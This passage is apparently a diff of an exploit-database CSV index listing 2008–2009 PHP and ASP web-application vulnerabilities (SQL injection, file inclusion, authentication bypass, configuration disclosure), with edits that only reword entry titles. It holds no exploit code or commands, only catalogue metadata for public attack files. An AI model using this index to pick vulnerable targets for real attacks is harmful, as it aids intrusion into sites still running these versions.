Inclusion",2008-05-25,DNX,php,webapps,0 5674,platforms/php/webapps/5674.txt,"RoomPHPlanning 1.5 - Arbitrary Add Admin",2008-05-26,Stack,php,webapps,0 5675,platforms/php/webapps/5675.txt,"RoomPHPlanning 1.5 - Multiple SQL Injections",2008-05-26,"Virangar Security",php,webapps,0 5676,platforms/php/webapps/5676.txt,"CMS MAXSITE 1.10 - 'category' SQL Injection",2008-05-26,Tesz,php,webapps,0 @@ -20239,7 +20242,7 @@ id,file,description,date,author,platform,type,port 6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0 6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 - Insecure Cookie Handling",2008-09-14,Stack,php,webapps,0 6460,platforms/php/webapps/6460.txt,"Kasseler CMS 1.1.0/1.2.0 Lite - SQL Injection",2008-09-14,~!Dok_tOR!~,php,webapps,0 -6461,platforms/php/webapps/6461.txt,"cPanel 11.x - 'Fantastico' Local File Inclusion (sec Bypass)",2008-09-14,joker_1,php,webapps,0 +6461,platforms/php/webapps/6461.txt,"cPanel 11.x - 'Fantastico' Local File Inclusion",2008-09-14,joker_1,php,webapps,0 6462,platforms/php/webapps/6462.pl,"CzarNews 1.20 - 'cookie' SQL Injection",2008-09-15,StAkeR,php,webapps,0 6464,platforms/php/webapps/6464.txt,"CzarNews 1.20 - Account Hijacking SQL Injection",2008-09-15,0ut0fbound,php,webapps,0 6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings - 'search.php' SQL Injection",2008-09-15,JosS,php,webapps,0 @@ -20772,7 +20775,7 @@ id,file,description,date,author,platform,type,port 7131,platforms/php/webapps/7131.txt,"yahoo answers - 'id' SQL Injection",2008-11-16,snakespc,php,webapps,0 7133,platforms/php/webapps/7133.txt,"FloSites Blog - Multiple SQL Injections",2008-11-16,Vrs-hCk,php,webapps,0 7134,platforms/php/webapps/7134.txt,"PHPstore Wholesale - 'id' SQL Injection",2008-11-16,"Hussin X",php,webapps,0 -7136,platforms/php/webapps/7136.txt,"mxCamArchive 2.2 - Bypass Config Download",2008-11-17,ahmadbady,php,webapps,0 +7136,platforms/php/webapps/7136.txt,"mxCamArchive 2.2 - Bypass Configuration Download",2008-11-17,ahmadbady,php,webapps,0 7137,platforms/asp/webapps/7137.txt,"OpenASP 3.0 - Blind SQL Injection",2008-11-17,StAkeR,asp,webapps,0 7138,platforms/php/webapps/7138.txt,"E-topbiz ADManager 4 - 'group' Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0 7140,platforms/php/webapps/7140.txt,"FREEze Greetings 1.0 - Remote Password Retrieve Exploit",2008-11-17,cOndemned,php,webapps,0 @@ -20872,7 +20875,7 @@ id,file,description,date,author,platform,type,port 7261,platforms/php/webapps/7261.txt,"Basic-CMS - Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps,0 7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - Authentication Bypass",2008-11-28,MrDoug,php,webapps,0 7265,platforms/php/webapps/7265.txt,"Web Calendar System 3.40 - Cross-Site Scripting / SQL Injection",2008-11-28,Bl@ckbe@rD,php,webapps,0 -7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 +7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Configuration Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - Authentication Bypass",2008-11-28,JIKO,php,webapps,0 7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0 7269,platforms/php/webapps/7269.pl,"CMS little 0.0.1 - 'term' SQL Injection",2008-11-28,"CWH Underground",php,webapps,0 @@ -20891,7 +20894,7 @@ id,file,description,date,author,platform,type,port 7283,platforms/asp/webapps/7283.txt,"Active Price Comparison 4 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 7284,platforms/php/webapps/7284.txt,"PHP TV Portal 2.0 - 'mid' SQL Injection",2008-11-29,Cyber-Zone,php,webapps,0 7285,platforms/php/webapps/7285.txt,"CMS Made Simple 1.4.1 - Local File Inclusion",2008-11-29,M4ck-h@cK,php,webapps,0 -7286,platforms/php/webapps/7286.txt,"OraMon 2.0.1 - Remote Config File Disclosure",2008-11-29,ahmadbady,php,webapps,0 +7286,platforms/php/webapps/7286.txt,"OraMon 2.0.1 - Remote Configuration File Disclosure",2008-11-29,ahmadbady,php,webapps,0 7287,platforms/asp/webapps/7287.txt,"ActiveVotes 2.2 - 'AccountID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7288,platforms/asp/webapps/7288.txt,"Active Web Mail 4 - Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7289,platforms/php/webapps/7289.txt,"Active Price Comparison 4 - 'ProductID' Blind SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0 @@ -21158,7 +21161,7 @@ id,file,description,date,author,platform,type,port 7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - SQL Injection",2008-12-29,"Virangar Security",php,webapps,0 7620,platforms/php/webapps/7620.txt,"ThePortal 2.2 - Arbitrary File Upload",2008-12-29,siurek22,php,webapps,0 7621,platforms/php/webapps/7621.txt,"PHPAlumni - SQL Injection",2008-12-29,Mr.SQL,php,webapps,0 -7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 - Admin Authentication Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0 +7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 - Admin Authentication Bypass / Possible PHP Code Writing",2008-12-29,Osirys,php,webapps,0 7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - Authentication Bypass",2008-12-30,S.W.A.T.,php,webapps,0 7625,platforms/php/webapps/7625.txt,"CMScout 2.06 - SQL Injection / Local File Inclusion",2008-12-30,SirGod,php,webapps,0 7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - Blind SQL Injection",2008-12-30,x0r,php,webapps,0 @@ -21170,7 +21173,7 @@ id,file,description,date,author,platform,type,port 7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - SQL Injection",2009-01-01,DaiMon,php,webapps,0 7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0 7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Arbitrary File Upload",2009-01-01,Lo$er,php,webapps,0 -7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - 'user.cfg' Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0 +7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - 'user.cfg' Remote Configuration Disclosure",2009-01-01,ahmadbady,php,webapps,0 7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - Authentication Bypass",2009-01-01,DNX,php,webapps,0 7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 - 'newsid' SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a - Authentication Bypass",2009-01-01,"Virangar Security",php,webapps,0 @@ -21200,12 +21203,12 @@ id,file,description,date,author,platform,type,port 7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection",2009-01-06,darkjoker,php,webapps,0 7686,platforms/php/webapps/7686.txt,"ItCMS 2.1a - Authentication Bypass",2009-01-06,certaindeath,php,webapps,0 7687,platforms/php/webapps/7687.txt,"PlaySms 0.9.3 - Multiple Local/Remote File Inclusions",2009-01-06,ahmadbady,php,webapps,0 -7689,platforms/php/webapps/7689.txt,"BlogHelper - Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0 -7690,platforms/php/webapps/7690.txt,"PollHelper - Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0 +7689,platforms/php/webapps/7689.txt,"BlogHelper - Remote Configuration File Disclosure",2009-01-06,ahmadbady,php,webapps,0 +7690,platforms/php/webapps/7690.txt,"PollHelper - Remote Configuration File Disclosure",2009-01-06,ahmadbady,php,webapps,0 7691,platforms/php/webapps/7691.php,"Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal",2009-01-07,irk4z,php,webapps,0 7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0 7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - 'items.php' SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0 -7699,platforms/php/webapps/7699.txt,"QuoteBook - Remote Config File Disclosure",2009-01-07,Moudi,php,webapps,0 +7699,platforms/php/webapps/7699.txt,"QuoteBook - Remote Configuration File Disclosure",2009-01-07,Moudi,php,webapps,0 7700,platforms/php/webapps/7700.php,"CuteNews 1.4.6 - 'ip ban' Authorized Cross-Site Scripting / Command Execution",2009-01-08,StAkeR,php,webapps,0 7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - 'comment_id' SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0 7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0 @@ -21435,7 +21438,7 @@ id,file,description,date,author,platform,type,port 8044,platforms/php/webapps/8044.txt,"Den Dating 9.01 - 'txtlookgender' SQL Injection",2009-02-11,nuclear,php,webapps,0 8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - 'query' SQL Injection",2009-02-11,Osirys,php,webapps,0 8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - 'id' SQL Injection",2009-02-12,x0r,php,webapps,0 -8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass / SQL Injection",2009-02-12,Muhacir,php,webapps,0 +8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass",2009-02-12,Muhacir,php,webapps,0 8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - 'Arbitrary '.ASP' File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - Local File Inclusion / SQL Injection",2009-02-13,nuclear,php,webapps,0 8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' SQL Injection",2009-02-13,JIKO,php,webapps,0 @@ -21451,13 +21454,13 @@ id,file,description,date,author,platform,type,port 8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'id' SQL Injection",2009-02-16,Darkb0x,asp,webapps,0 8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0 8068,platforms/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps,0 -8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Authentication Bypass (Cookie SQL Injection)",2009-02-16,x0r,php,webapps,0 +8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Cookie Authentication Bypass",2009-02-16,x0r,php,webapps,0 8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System - Arbitrary File Upload",2009-02-17,ZoRLu,asp,webapps,0 -8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete Vulnerabilities",2009-02-17,x0r,php,webapps,0 +8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete",2009-02-17,x0r,php,webapps,0 8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'mod' SQL Injection",2009-02-17,x0r,php,webapps,0 8073,platforms/php/webapps/8073.txt,"pHNews Alpha 1 - 'genbackup.php' Database Disclosure",2009-02-17,x0r,php,webapps,0 8075,platforms/php/webapps/8075.pl,"Firepack - '/admin/ref.php' Remote Code Execution",2009-02-18,Lidloses_Auge,php,webapps,0 -8076,platforms/php/webapps/8076.txt,"smNews 1.0 - Authentication Bypass/Column Truncation Vulnerabilities",2009-02-18,x0r,php,webapps,0 +8076,platforms/php/webapps/8076.txt,"smNews 1.0 - Authentication Bypass / Column Truncation",2009-02-18,x0r,php,webapps,0 8083,platforms/php/webapps/8083.txt,"phpBB 3 - 'autopost bot mod 0.1.3' Remote File Inclusion",2009-02-20,Kacper,php,webapps,0 8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 8086,platforms/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 @@ -21546,7 +21549,7 @@ id,file,description,date,author,platform,type,port 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - 'module_pages_site.php' Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0 8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - Command Execution (via SQL Injection)",2009-03-23,darkjoker,php,webapps,0 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Injection",2009-03-23,Osirys,php,webapps,0 -8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 - Authentication Bypass (SQL Injection) / Arbitrary File Upload",2009-03-23,Mr.Skonnie,php,webapps,0 +8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 - Authentication Bypass / Arbitrary File Upload",2009-03-23,Mr.Skonnie,php,webapps,0 8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox 2.8 - 'name' Local File Inclusion",2009-03-24,dun,php,webapps,0 8279,platforms/php/webapps/8279.txt,"PHPizabi 0.848b C1 HFP1 - Privilege Escalation",2009-03-24,Nine:Situations:Group,php,webapps,0 8282,platforms/php/webapps/8282.txt,"SurfMyTV Script 1.0 - 'view.php?id' SQL Injection",2009-03-24,x0r,php,webapps,0 @@ -21628,12 +21631,12 @@ id,file,description,date,author,platform,type,port 8433,platforms/php/webapps/8433.txt,"RQms (Rash) 1.2.2 - Multiple SQL Injections",2009-04-14,Dimi4,php,webapps,0 8435,platforms/php/webapps/8435.txt,"phpEmployment - 'conf.inc' File Disclosure",2009-04-14,InjEctOr5,php,webapps,0 8436,platforms/php/webapps/8436.txt,"Job2C 4.2 - 'profile' Arbitrary File Upload",2009-04-15,InjEctOr5,php,webapps,0 -8437,platforms/php/webapps/8437.txt,"phpAdBoard - 'conf.inc' Remote Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 +8437,platforms/php/webapps/8437.txt,"phpAdBoard - 'conf.inc' Remote Configuration File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8438,platforms/php/webapps/8438.txt,"phpGreetCards - Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 -8439,platforms/php/webapps/8439.txt,"W2B Restaurant 1.2 - 'conf.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 -8440,platforms/php/webapps/8440.txt,"phpAdBoardPro - 'config.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 +8439,platforms/php/webapps/8439.txt,"W2B Restaurant 1.2 - 'conf.inc' Configuration File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 +8440,platforms/php/webapps/8440.txt,"phpAdBoardPro - 'config.inc' Configuration File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8441,platforms/php/webapps/8441.txt,"phpDatingClub - 'conf.inc' File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 -8442,platforms/php/webapps/8442.txt,"Job2C - 'conf.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 +8442,platforms/php/webapps/8442.txt,"Job2C - 'conf.inc' Configuration File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8443,platforms/php/webapps/8443.txt,"Job2C 4.2 - 'adtype' Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0 8446,platforms/php/webapps/8446.txt,"FreeWebShop.org 2.2.9 RC2 - 'lang_file' Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0 8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - 'savepreferences()/*blocks[]' SQL Injection",2009-04-16,Nine:Situations:Group,php,webapps,0 @@ -21645,7 +21648,7 @@ id,file,description,date,author,platform,type,port 8457,platforms/php/webapps/8457.txt,"NetHoteles 3.0 - 'ficha.php' SQL Injection",2009-04-16,snakespc,php,webapps,0 8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - '/manage-admin.php' Arbitrary Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0 8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusions",2009-04-16,JosS,php,webapps,0 -8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - (Authentication Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0 +8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - Authentication Bypass",2009-04-16,tmh,php,webapps,0 8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - Authentication Bypass",2009-04-17,"Salvatore Fresta",php,webapps,0 8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation (PoC)",2009-04-17,"Alfons Luja",php,webapps,0 8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Insecure Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0 @@ -21738,7 +21741,7 @@ id,file,description,date,author,platform,type,port 8636,platforms/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injections",2009-05-07,YEnH4ckEr,php,webapps,0 8638,platforms/php/webapps/8638.htm,"Simple Customer 1.3 - Arbitrary Change Admin Password",2009-05-07,ahmadbady,php,webapps,0 8639,platforms/php/webapps/8639.htm,"Job Script 2.0 - Arbitrary Change Admin Password",2009-05-07,TiGeR-Dz,php,webapps,0 -8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - (Authentication Bypass) SQL Injection / Database Backup",2009-05-08,TiGeR-Dz,php,webapps,0 +8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - Authentication Bypass / Database Backup",2009-05-08,TiGeR-Dz,php,webapps,0 8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 - Authentication Bypass",2009-05-08,"ThE g0bL!N",php,webapps,0 8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable - Authentication Bypass",2009-05-08,knxone,php,webapps,0 8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0 @@ -21755,7 +21758,7 @@ id,file,description,date,author,platform,type,port 8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 - Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,php,webapps,0 8671,platforms/php/webapps/8671.pl,"Family Connections CMS 1.9 - SQL Injection",2009-05-13,YEnH4ckEr,php,webapps,0 8672,platforms/php/webapps/8672.php,"MaxCMS 2.0 - 'm_username' Arbitrary Create Admin Exploit",2009-05-13,Securitylab.ir,php,webapps,0 -8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 - (Authentication Bypass / Cookie) SQL Injection",2009-05-13,Qabandi,php,webapps,0 +8674,platforms/php/webapps/8674.txt,"Mlffat 2.1 - Cookie Authentication Bypass",2009-05-13,Qabandi,php,webapps,0 8675,platforms/php/webapps/8675.txt,"Ascad Networks 5 - Products Insecure Cookie Handling",2009-05-14,G4N0K,php,webapps,0 8676,platforms/php/webapps/8676.txt,"My Game Script 2.0 - Authentication Bypass",2009-05-14,"ThE g0bL!N",php,webapps,0 8679,platforms/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple SQL Injections",2009-05-14,YEnH4ckEr,php,webapps,0 @@ -21779,7 +21782,7 @@ id,file,description,date,author,platform,type,port 8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - SQL Injection / Cross-Site Scripting",2009-05-15,snakespc,php,webapps,0 8705,platforms/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 - Database Disclosure",2009-05-15,S4S-T3rr0r!sT,asp,webapps,0 8706,platforms/php/webapps/8706.pl,"PHPenpals 1.1 - 'mail.php?ID' SQL Injection",2009-05-15,Br0ly,php,webapps,0 -8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection",2009-05-15,YEnH4ckEr,php,webapps,0 +8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-15,YEnH4ckEr,php,webapps,0 8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-15,YEnH4ckEr,php,webapps,0 8709,platforms/php/webapps/8709.txt,"Pc4Uploader 9.0 - Blind SQL Injection",2009-05-18,Qabandi,php,webapps,0 8710,platforms/php/webapps/8710.txt,"PHP Dir Submit - Authentication Bypass",2009-05-18,snakespc,php,webapps,0 @@ -21846,7 +21849,7 @@ id,file,description,date,author,platform,type,port 8801,platforms/php/webapps/8801.txt,"Joomla! Component com_rsgallery2 1.14.x/2.x - Remote Backdoor",2009-05-26,"Jan Van Niekerk",php,webapps,0 8802,platforms/php/webapps/8802.txt,"Kensei Board 2.0.0b - Multiple SQL Injections",2009-05-26,cOndemned,php,webapps,0 8803,platforms/php/webapps/8803.txt,"MyForum 1.3 - Authentication Bypass",2009-05-26,"ThE g0bL!N",php,webapps,0 -8805,platforms/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Config File Disclosure",2009-05-26,DarkbiteX,php,webapps,0 +8805,platforms/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Configuration File Disclosure",2009-05-26,DarkbiteX,php,webapps,0 8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - 'addAdminmembercode.php' Arbitrary Add Admin",2009-05-26,x.CJP.x,php,webapps,0 8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - Authentication Bypass",2009-05-26,ByALBAYX,php,webapps,0 8809,platforms/php/webapps/8809.htm,"ZeeCareers 2.0 - 'addAdminmembercode.php' Arbitrary Add Admin",2009-05-26,x.CJP.x,php,webapps,0 @@ -21868,7 +21871,7 @@ id,file,description,date,author,platform,type,port 8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - Authentication Bypass",2009-05-29,"sniper code",php,webapps,0 8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' SQL Injection",2009-05-29,Br0ly,php,webapps,0 8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links 1.0 - 'id' SQL Injection",2009-05-29,Qabandi,php,webapps,0 -8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - (Authentication Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0 +8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - Cookie Authentication Bypass",2009-05-29,Qabandi,php,webapps,0 8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - 'seller' SQL Injection",2009-06-01,Br0ly,php,webapps,0 8836,platforms/php/webapps/8836.txt,"OCS Inventory NG 1.02 - Multiple SQL Injections",2009-06-01,"Nico Leidecker",php,webapps,0 8838,platforms/php/webapps/8838.txt,"elitecms 1.01 - SQL Injection / Cross-Site Scripting",2009-06-01,xeno_hive,php,webapps,0 @@ -21936,7 +21939,7 @@ id,file,description,date,author,platform,type,port 8919,platforms/php/webapps/8919.txt,"Joomla! Component com_realestatemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 8920,platforms/php/webapps/8920.txt,"Joomla! Component com_vehiclemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 8921,platforms/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection",2009-06-09,"Adrian _pagvac_ Pastor",php,webapps,0 -8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db 2.2.x - System Config Disclosure",2009-06-10,StAkeR,php,webapps,0 +8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db 2.2.x - System Configuration Disclosure",2009-06-10,StAkeR,php,webapps,0 8924,platforms/php/webapps/8924.txt,"School Data Navigator - 'page' Local/Remote File Inclusion",2009-06-10,Br0ly,php,webapps,0 8925,platforms/php/webapps/8925.txt,"Desi Short URL Script - (Authentication Bypass) Insecure Cookie Handling",2009-06-10,N@bilX,php,webapps,0 8926,platforms/php/webapps/8926.txt,"mrcgiguy freeticket - Cookie Handling / SQL Injection",2009-06-10,"ThE g0bL!N",php,webapps,0 @@ -22007,12 +22010,12 @@ id,file,description,date,author,platform,type,port 9018,platforms/php/webapps/9018.txt,"MyFusion 6b - settings[locale] Local File Inclusion",2009-06-25,CraCkEr,php,webapps,0 9019,platforms/php/webapps/9019.txt,"AlumniServer 1.0.1 - Authentication Bypass",2009-06-25,YEnH4ckEr,php,webapps,0 9020,platforms/php/webapps/9020.py,"AlumniServer 1.0.1 - 'resetpwemail' Blind SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0 -9021,platforms/php/webapps/9021.txt,"MD-Pro 1.083.x - Survey Module (pollID) Blind SQL Injection",2009-06-25,XaDoS,php,webapps,0 +9021,platforms/php/webapps/9021.txt,"MD-Pro 1.083.x - Survey Module 'pollID' Blind SQL Injection",2009-06-25,XaDoS,php,webapps,0 9022,platforms/php/webapps/9022.txt,"Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-06-26,HxH,php,webapps,0 9023,platforms/php/webapps/9023.txt,"PHP-Address Book 4.0.x - Multiple SQL Injections",2009-06-26,YEnH4ckEr,php,webapps,0 9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - Authentication Bypass",2009-06-26,"ThE g0bL!N",php,webapps,0 9025,platforms/php/webapps/9025.txt,"Mega File Manager 1.0 - 'index.php' Local File Inclusion",2009-06-26,SirGod,php,webapps,0 -9026,platforms/php/webapps/9026.txt,"WHOISCART - (Authentication Bypass) Information Disclosure",2009-06-29,SecurityRules,php,webapps,0 +9026,platforms/php/webapps/9026.txt,"WHOISCART - Authentication Bypass / Information Disclosure",2009-06-29,SecurityRules,php,webapps,0 9027,platforms/php/webapps/9027.txt,"Messages Library 2.0 - 'cat.php?CatID' SQL Injection",2009-06-29,SecurityRules,php,webapps,0 9028,platforms/php/webapps/9028.txt,"Joomla! Component com_php - 'id' Blind SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps,0 9030,platforms/php/webapps/9030.txt,"Joomla! Component com_K2 -q 1.0.1b - 'category' SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps,0 @@ -22083,7 +22086,7 @@ id,file,description,date,author,platform,type,port 9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps,0 9145,platforms/php/webapps/9145.php,"Traidnt UP 2.0 - Blind SQL Injection",2009-07-14,Qabandi,php,webapps,0 9150,platforms/php/webapps/9150.txt,"WordPress Plugin My Category Order 2.8 - SQL Injection",2009-07-15,"Manh Luat",php,webapps,0 -9151,platforms/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities",2009-07-15,YEnH4ckEr,php,webapps,0 +9151,platforms/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition / Information Disclosure",2009-07-15,YEnH4ckEr,php,webapps,0 9153,platforms/php/webapps/9153.txt,"Admin News Tools 2.5 - 'fichier' Remote File Disclosure",2009-07-15,Securitylab.ir,php,webapps,0 9154,platforms/php/webapps/9154.js,"ZenPhoto 1.2.5 - Completely Blind SQL Injection",2009-07-15,petros,php,webapps,0 9155,platforms/php/webapps/9155.txt,"PHPGenealogy 2.0 - 'DataDirectory' Remote File Inclusion",2009-07-15,"Khashayar Fereidani",php,webapps,0 @@ -22181,7 +22184,7 @@ id,file,description,date,author,platform,type,port 9324,platforms/php/webapps/9324.txt,"Joomla! Component com_jfusion - 'itemID' Blind SQL Injection",2009-08-01,"Chip d3 bi0s",php,webapps,0 9325,platforms/php/webapps/9325.txt,"PortalXP Teacher Edition 1.2 - Multiple SQL Injections",2009-08-01,SirGod,php,webapps,0 9326,platforms/php/webapps/9326.txt,"aa33code 0.0.1 - Local File Inclusion / Authentication Bypass / File Disclosure",2009-08-01,SirGod,php,webapps,0 -9327,platforms/php/webapps/9327.txt,"mobilelib gold 3.0 - Authentication Bypass / SQL Injection",2009-08-01,SwEET-DeViL,php,webapps,0 +9327,platforms/php/webapps/9327.txt,"Mobilelib Gold 3.0 - Authentication Bypass / SQL Injection",2009-08-01,SwEET-DeViL,php,webapps,0 9328,platforms/asp/webapps/9328.txt,"AW BannerAd - Authentication Bypass",2009-08-03,Ro0T-MaFia,asp,webapps,0 9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - 'pda_projects.php?offset' Remote File Inclusion",2009-08-03,cr4wl3r,php,webapps,0 9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script - Authentication Bypass",2009-08-03,Cicklow,php,webapps,0 @@ -22220,7 +22223,7 @@ id,file,description,date,author,platform,type,port 9387,platforms/php/webapps/9387.txt,"Banner Exchange Script 1.0 